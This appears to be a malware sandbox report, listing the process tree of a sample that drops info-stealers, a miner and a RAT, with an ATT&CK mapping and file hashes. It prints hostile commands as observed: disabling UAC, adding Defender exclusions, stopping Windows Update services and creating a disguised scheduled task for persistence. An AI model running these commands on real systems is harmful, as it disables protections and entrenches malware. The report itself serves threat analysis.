"C:\Users\Admin\AppData\Local\Temp\a\tg.exe"
2⤵
PID:6640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
3⤵
PID:7908

C:\Users\Admin\AppData\Local\Temp\a\putty.exe
"C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
2⤵
PID:6212

C:\Users\Admin\AppData\Local\Temp\a\v.exe
"C:\Users\Admin\AppData\Local\Temp\a\v.exe"
2⤵
PID:6516

C:\Program Files (x86)\Google\Temp\GUM16E0.tmp\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Temp\GUM16E0.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty"
3⤵
PID:7248

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
4⤵
PID:3840

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
4⤵
PID:8064

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
5⤵
PID:7708

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
5⤵
PID:5740

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
5⤵
PID:7384

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMjIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RUJCRDYzQjMtODJCMS00NzU1LThDRTgtMDI5MjJCRjRBNTUxfSIgdXNlcmlkPSJ7MDY0NTc2NzUtNjkwMy00MkNELUFGQ0YtMjk3RDhDQUJBQjA3fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0QwRkMzRDBGLTNENUUtNDNDNS1BMUQwLUYyMzFBOTExOTc0RX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4xMjIiIGxhbmc9ImVuIiBicmFuZD0iQ0hCRiIgY2xpZW50PSIiIGlpZD0iezQ2MTFFMDg3LUNCNzAtMjQ0Qi05MjAyLUY2MDUzNTdBMDJGNH0iPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iNDM1NjAiLz48L2FwcD48L3JlcXVlc3Q-
4⤵
PID:6120

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty" /installsource taggedmi /sessionid "{EBBD63B3-82B1-4755-8CE8-02922BF4A551}"
4⤵
PID:3448

C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe
"C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe"
2⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe
"C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe"
2⤵
PID:7408

C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe
"C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe"
2⤵
PID:8004

C:\Users\Admin\AppData\Local\Temp\a\redline.exe
"C:\Users\Admin\AppData\Local\Temp\a\redline.exe"
2⤵
PID:7508

C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe
"C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe"
2⤵
PID:6424

C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe
"C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe"
2⤵
PID:7552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
3⤵
PID:8036

C:\Baldi\DisableUAC.exe
C:\Baldi\DisableUAC.exe
4⤵
PID:5388

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F0B5.tmp\F0B6.bat C:\Baldi\DisableUAC.exe"
5⤵
PID:3752

C:\Windows\system32\reg.exe
reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
6⤵
PID:7460

C:\Windows\system32\shutdown.exe
shutdown -r -t 1 -c "BALDI EVIL..."
6⤵
PID:5328

C:\Baldi\Baldi.exe
C:\Baldi\Baldi.exe
4⤵
PID:7748

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im explorer.exe
5⤵
- Kills process with taskkill
PID:5288

C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
2⤵
PID:8096

C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe
"C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe"
2⤵
PID:8052

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:788

C:\Users\Admin\AppData\Local\Temp\a\ss49.exe
"C:\Users\Admin\AppData\Local\Temp\a\ss49.exe"
2⤵
PID:7296

C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe"
2⤵
PID:3084

C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe"
3⤵
PID:5508

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
2⤵
PID:5328

C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
3⤵
PID:5828

C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
2⤵
PID:8132

C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
3⤵
PID:8808

C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe"
2⤵
PID:8044

C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe"
3⤵
PID:6624

C:\Users\Admin\AppData\Local\Temp\a\work.exe
"C:\Users\Admin\AppData\Local\Temp\a\work.exe"
2⤵
PID:7096

C:\Users\Admin\AppData\Local\Temp\a\updater.exe
"C:\Users\Admin\AppData\Local\Temp\a\updater.exe"
2⤵
PID:7552

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\wscript.exe" vai.vbe
3⤵
PID:9112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /release
4⤵
PID:8704

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:6636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c lbvcefvmm.pif pvanphvj.exe
4⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\RarSFX0\lbvcefvmm.pif
lbvcefvmm.pif pvanphvj.exe
5⤵
PID:7304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /renew
4⤵
PID:8280

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /renew
5⤵
- Gathers network information
PID:5688

C:\Users\Admin\AppData\Local\Temp\a\1232.exe
"C:\Users\Admin\AppData\Local\Temp\a\1232.exe"
2⤵
PID:7236

C:\Users\Admin\AppData\Local\Temp\a\1232.exe
"C:\Users\Admin\AppData\Local\Temp\a\1232.exe"
3⤵
PID:4344

C:\Users\Admin\AppData\Local\Temp\a\1232.exe
"C:\Users\Admin\AppData\Local\Temp\a\1232.exe"
3⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
2⤵
PID:7208

C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
3⤵
PID:684

C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
2⤵
PID:2064

C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\plugmanzx.exe"
3⤵
PID:7112

C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe"
2⤵
PID:8076

C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\grammyzx.exe"
3⤵
PID:8648

C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe"
2⤵
PID:8812

C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\petercodyzx.exe"
3⤵
PID:6344

C:\Users\Admin\AppData\Local\Temp\a\clp5.exe
"C:\Users\Admin\AppData\Local\Temp\a\clp5.exe"
2⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\a\hussanzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\hussanzx.exe"
2⤵
PID:7156

C:\Users\Admin\AppData\Local\Temp\a\hussanzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\hussanzx.exe"
3⤵
PID:6508

C:\Users\Admin\AppData\Local\Temp\a\smithempirezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\smithempirezx.exe"
2⤵
PID:7088

C:\Users\Admin\AppData\Local\Temp\a\smithempirezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\smithempirezx.exe"
3⤵
PID:5364

C:\Users\Admin\AppData\Local\Temp\a\smithempirezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\smithempirezx.exe"
3⤵
PID:9072

C:\Users\Admin\AppData\Local\Temp\a\oyozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\oyozx.exe"
2⤵
PID:1916

C:\Users\Admin\AppData\Local\Temp\a\oyozx.exe
"C:\Users\Admin\AppData\Local\Temp\a\oyozx.exe"
3⤵
PID:7428

C:\Users\Admin\AppData\Local\Temp\a\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\a\3eef203fb515bda85f514e168abb5973.exe"
2⤵
PID:5632

C:\Users\Admin\AppData\Local\Temp\a\full_min_cr.exe
"C:\Users\Admin\AppData\Local\Temp\a\full_min_cr.exe"
2⤵
PID:1132

C:\Users\Admin\AppData\Local\Temp\a\full_min_cr.exe
"{path}"
3⤵
PID:5656

C:\Users\Admin\AppData\Local\Temp\a\ducktest.exe
"C:\Users\Admin\AppData\Local\Temp\a\ducktest.exe"
2⤵
PID:1876

C:\Users\Admin\AppData\Local\Temp\a\csrss.exe
"C:\Users\Admin\AppData\Local\Temp\a\csrss.exe"
2⤵
PID:5244

C:\Users\Admin\AppData\Local\Temp\a\papizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\papizx.exe"
2⤵
PID:3200

C:\Users\Admin\AppData\Local\Temp\a\papizx.exe
"C:\Users\Admin\AppData\Local\Temp\a\papizx.exe"
3⤵
PID:1732

C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
4⤵
PID:4624

C:\Users\Admin\AppData\Local\Temp\a\wdagad.exe
"C:\Users\Admin\AppData\Local\Temp\a\wdagad.exe"
2⤵
PID:3632

C:\Users\Admin\AppData\Local\Temp\a\bld_3.exe
"C:\Users\Admin\AppData\Local\Temp\a\bld_3.exe"
2⤵
PID:8732

C:\Users\Admin\AppData\Local\Temp\a\pmexzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pmexzx.exe"
2⤵
PID:8320

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4252

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v6523285.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v6523285.exe
1⤵
PID:3008

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\v6333947.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\v6333947.exe
2⤵
PID:3532

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\v6060412.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\v6060412.exe
3⤵
PID:1092

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\a0310567.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\a0310567.exe
4⤵
PID:4212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
5⤵
PID:2012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4212 -s 144
5⤵
- Program crash
PID:4568

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\b7201524.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\b7201524.exe
4⤵
PID:5460

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
5⤵
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 568
5⤵
- Program crash
PID:5764

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\c4154678.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\c4154678.exe
3⤵
PID:7180

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\d5088359.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\d5088359.exe
2⤵
PID:8572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:64

C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe"
2⤵
PID:5340

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:3460

C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\y5856720.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\y5856720.exe
1⤵
PID:4816

C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\y9894232.exe
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\y9894232.exe
2⤵
PID:3112

C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\j4949779.exe
C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\j4949779.exe
3⤵
PID:1472

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
PID:3140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 592
4⤵
- Program crash
PID:1876

C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\k9666184.exe
C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\k9666184.exe
3⤵
PID:6084

C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\l5357161.exe
C:\Users\Admin\AppData\Local\Temp\IXP012.TMP\l5357161.exe
2⤵
PID:5864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:312

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe"
2⤵
PID:4480

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:5212

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:5484

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:5396

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:5704

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:2468

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:4824

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:5712

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:5844

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:1344

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:5412

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:4800

C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\SysWOW64\autofmt.exe"
2⤵
PID:6016

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:2408

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
2⤵
PID:2664

C:\Windows\SysWOW64\wlanext.exe
"C:\Windows\SysWOW64\wlanext.exe"
2⤵
PID:6080

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:5320

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:3508

C:\Windows\System32\GamePanel.exe
"C:\Windows\System32\GamePanel.exe" 0000000000030388 /startuptips
1⤵
PID:5304

C:\Windows\System32\bcastdvr.exe
"C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer
1⤵
PID:4812

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:5144

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
2⤵
PID:3868

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:6016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#acjnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\Admin\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; }
1⤵
PID:6012

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:3980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#acjnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\Admin\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; }
1⤵
PID:2004

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "sethc"
1⤵
PID:1204

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:5216

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "sethc"
1⤵
PID:1424

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:5776

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:6536

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6888 -s 292
1⤵
- Program crash
PID:704

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6888 -s 376
1⤵
- Program crash
PID:308

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:5068

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1108 -s 364
1⤵
- Program crash
PID:6988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7160

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:6972

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1108 -s 448
1⤵
- Program crash
PID:3752

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:7632

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8120 -s 296
1⤵
- Program crash
PID:7184

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5968 -s 328
1⤵
- Program crash
PID:7312

C:\Users\Admin\AppData\Local\Microsoft\6q~zz).exe
"C:\Users\Admin\AppData\Local\Microsoft\6q~zz).exe"
1⤵
PID:8440

C:\Users\Admin\AppData\Local\Microsoft\6q~zz).exe
C:\Users\Admin\AppData\Local\Microsoft\6q~zz).exe
2⤵
PID:7888

C:\Users\Admin\AppData\Local\Microsoft\6q~zz).exe
C:\Users\Admin\AppData\Local\Microsoft\6q~zz).exe
2⤵
PID:8196

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
PID:7896

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:3632

C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe
C:\Users\Admin\AppData\Local\EsetSecurity\combo.exe
1⤵
PID:376

C:\Users\Admin\AppData\Local\Microsoft\%3Q6n.exe
"C:\Users\Admin\AppData\Local\Microsoft\%3Q6n.exe"
1⤵
PID:6328

C:\Users\Admin\AppData\Local\Microsoft\%3Q6n.exe
C:\Users\Admin\AppData\Local\Microsoft\%3Q6n.exe
2⤵
PID:4020

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x428
1⤵
PID:7184

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\0b59d43cdcb34293b025c777656e9b49 /t 7832 /p 7748
1⤵
PID:8508

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ae1855 /state1:0x41c64e6d
1⤵
PID:6596

C:\Users\Admin\AppData\Roaming\ajbrwhd
C:\Users\Admin\AppData\Roaming\ajbrwhd
1⤵
PID:3888

C:\Users\Admin\AppData\Roaming\jhbrwhd
C:\Users\Admin\AppData\Roaming\jhbrwhd
1⤵
PID:9128

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
C:\Users\Admin\AppData\Local\Temp\a9e2a16078\lamod.exe
1⤵
PID:2404

C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe
"C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe"
1⤵
PID:6720

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ae2855 /state1:0x41c64e6d
1⤵
PID:4156

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20230609-1951.dm
1⤵
PID:8956

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 8848 -s 324
1⤵
- Program crash
PID:6660

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ae3055 /state1:0x41c64e6d
1⤵
PID:8400

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

System Information Discovery

T1082

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateSetup.exe
Filesize
1.3MB

MD5
ebf39794ba6132055e6114d47bc18941

SHA1
214dead1bd716c58709c39a8180551b737048785

SHA256
8af777d0f92cef2d9040a634527c3753669235589c23129f09855ad0ebe10c6f

SHA512
01e7521af569050acc473fd13c8dd9a781370bd7cefcbc7e953e66ab930f407e9791c9fdb2ab4f368579f16bebb7368bebd2a475351a42d9e2092da0835bffbb

Download Submit
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Filesize
152KB

MD5
e4bf1e4d8477fbf8411e274f95a0d528

SHA1
a3ff668cbc56d22fb3b258fabff26bac74a27e21

SHA256
62f622b022d4d8a52baf02bcf0c163f6fd046265cc4553d2a8b267f8eded4b76

SHA512
429d99fc7578d07c02b69e6daf7d020cff9baa0098fbd15f05539cb3b78c3ac4a368dee500c4d14b804d383767a7d5e8154e61d4ab002d610abed4d647e14c70

Download Submit
C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe
Filesize
15.1MB

MD5
651549239e1b3bba64442f92d890db6d

SHA1
55a8d0c1469e943ef454666ff442c7f21cf235b0

SHA256
5f760b7e1de614a5b1eb8f8b92b53f5cf94c8ac6b9db8db71c544c79d151cd91

SHA512
256b9913ef58dd5246b71fa941ccaf3741e839d01afe85ad4a6172314ee297f9c5da3a3107df3cedc9edbf05de807e5322d3490997cbce5219d56e71c0e744ad

Download Submit
C:\ProgramData\GitLibedll\YKNH.exe
Filesize
6.6MB

MD5
f7d407bc224149132c728894ea8cd98d

SHA1
3a94fa8c9610936c6062db75df8f52402fcc5bd0

SHA256
bbbaff64ce087f4f14be0944b1db9f8166cfbd9e0d79d7d77523c47ad9611912

SHA512
a1917d8d0805a4af6909ff4be57d4c63df272e1b8888c77515f8442c3bb42b67dc595a12169babbcfbb9acf753999fb201e430f5fbc24b5b9316b7293a595291

Download Submit
C:\ProgramData\Rfmcos\rfmcos.exe
Filesize
478KB

MD5
9aa44989b63c667ede9f25e26497c20f

SHA1
